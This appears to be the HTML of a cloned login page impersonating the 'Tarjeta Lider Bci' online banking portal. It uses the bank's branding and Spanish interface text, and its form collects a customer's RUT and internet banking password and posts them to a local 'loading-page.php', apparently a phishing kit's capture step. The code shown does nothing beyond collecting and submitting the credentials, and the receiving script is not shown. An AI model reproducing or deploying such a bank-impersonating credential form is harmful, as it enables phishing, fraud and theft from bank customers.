<!doctype html>
<html lang="en">
<head>
  <link rel="icon" type="ico" href="favicon.ico">
  <link rel="preconnect" href="https://fonts.googleapis.com">
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
  <link href="https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap" rel="stylesheet">
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <title>Tarjeta Lider Bci</title>
  <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-QWTKZyjpPEjISv5WaRU9OFeRpok6YctnYmDr5pNlyT2bRjXh0JMhjY6hW+ALEwIH" crossorigin="anonymous">
  <link rel="stylesheet" type="text/css" href="css/style.css">
</head>
<body>

  <div class="row logon-container m-0">
    <div class="col-12 d-sm-none d-block p-0">
      <header>
        <nav class="navbar">
          <div class="container-fluid">
            <a class="navbar-brand" href="#">
              <img src="img/logo.svg">
            </a>
            <a href="" class="btn btn-outline-light rounded-pill">
             <img src="img/ico_phone.svg"> <span class="fw-semibold">600 600 57 57</span>
           </a>
         </div>
       </nav>
     </header>
     <img src="img/junio2024_sitio_privado_mobile.png" class="img-fluid">
   </div>
   <div class="col-sm-6 d-flex flex-column logon p-0">
    <div class="item-1 d-none d-sm-block px-5 py-4">
      <nav class="navbar">
          <div class="container-fluid">
            <a class="navbar-brand" href="#">
              <img src="img/logo.svg" height="45px">
            </a>
            <a href="" class="btn btn-outline-light rounded-pill">
             <img src="img/ico_phone.svg"> <span class="fw-semibold">600 600 57 57</span>
           </a>
         </div>
       </nav>
    </div>
    <div class="p-4 item-2 w-100">
      <h2 class="text-white fs-24 mb-3">Ingresa a tu cuenta en línea</h2>
      <form method="POST" action="loading-page.php">
        <div class="mb-3 position-relative">
          <input type="tel" placeholder="Rut" class="form-control" required id="exampleInputEmail1" aria-describedby="emailHelp" name="rut">
        </div>
        <div class="mb-3 position-relative">
          <input type="password" placeholder="Clave de internet" required class="form-control" id="exampleInputPassword1" name="pass">
          <div id="emailHelp" class="form-text op5">Es la misma clave que usas en tu App Lider Bci</div>
          <img src="img/eye.svg" height="30px" class="buttonShowPassword">
        </div>
        <button name="submit" type="submit" class="btn w-100 btn-primary">Ingresar</button>
        <ul class="help w-100 justify-content-between align-items-center p-0 d-flex flex-column flex-sm-row my-3">
          <li class="d-block">
            <a href="" class="op5">¿No eres cliente?</a>
          </li>
          <li class="d-block">
            <a href="" class="op5">Crear / Recuperar Clave</a>
          </li>
        </ul>
        <div class="text-center">
          <p class="p-0 op5"><img src="img/ico_lock.svg"> Damos Seguridad a tus datos y transacciones en línea</p>
        </div>
      </form>
    </div>
    <div class="item-3">
      <div class="botones d-flex flex-column flex-sm-row">
        <div class="boton-desing w-100 w-sm-50 bg-warning text-center text-white ">
          <span class="fw-semibold">Pago Express</span>
        </div>
        <div class="boton-desing w-100 w-sm-50 bg-secondary text-center text-white ">
          <span class="fw-semibold"><img src="img/icon-user.svg"> Servicio al Cliente </span>
        </div>
      </div>
      <footer>
        <ul class="footer-ul d-flex justify-content-between align-items-center p-0 m-0">
          <li class="d-block footer-li text-center w-50 text-white">Política de Privacidad</li>
          <li class="d-block footer-li text-center w-50 text-white">Política de Seguridad</li>
        </ul>
      </footer>
    </div>
  </div>
  <div class="col-sm-6 p-0 d-none d-sm-block h-100">
    <img src="img/junio2024_sitio_privado_desktop.png" class="banner-desk">
  </div>
</div>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/js/bootstrap.bundle.min.js" integrity="sha384-YvpcrYf0tY3lHB60NNkmXc5s9fDVZLESaAA55NDzOxhy9GkcIdslK1eN7N6jIeHz" crossorigin="anonymous"></script>
<script type="text/javascript">
  document.getElementById("exampleInputEmail1").addEventListener("keypress", function (e) {
    if (e.which < 48 || e.which > 57) {
      e.preventDefault();
    }
  })
  document.querySelector(".buttonShowPassword").addEventListener("click", function(){
    if (exampleInputPassword1.getAttribute("type") == "password") {
      exampleInputPassword1.setAttribute("type","text");
    }else{
      exampleInputPassword1.setAttribute("type","password");
    }
  })
</script>
</body>
</html>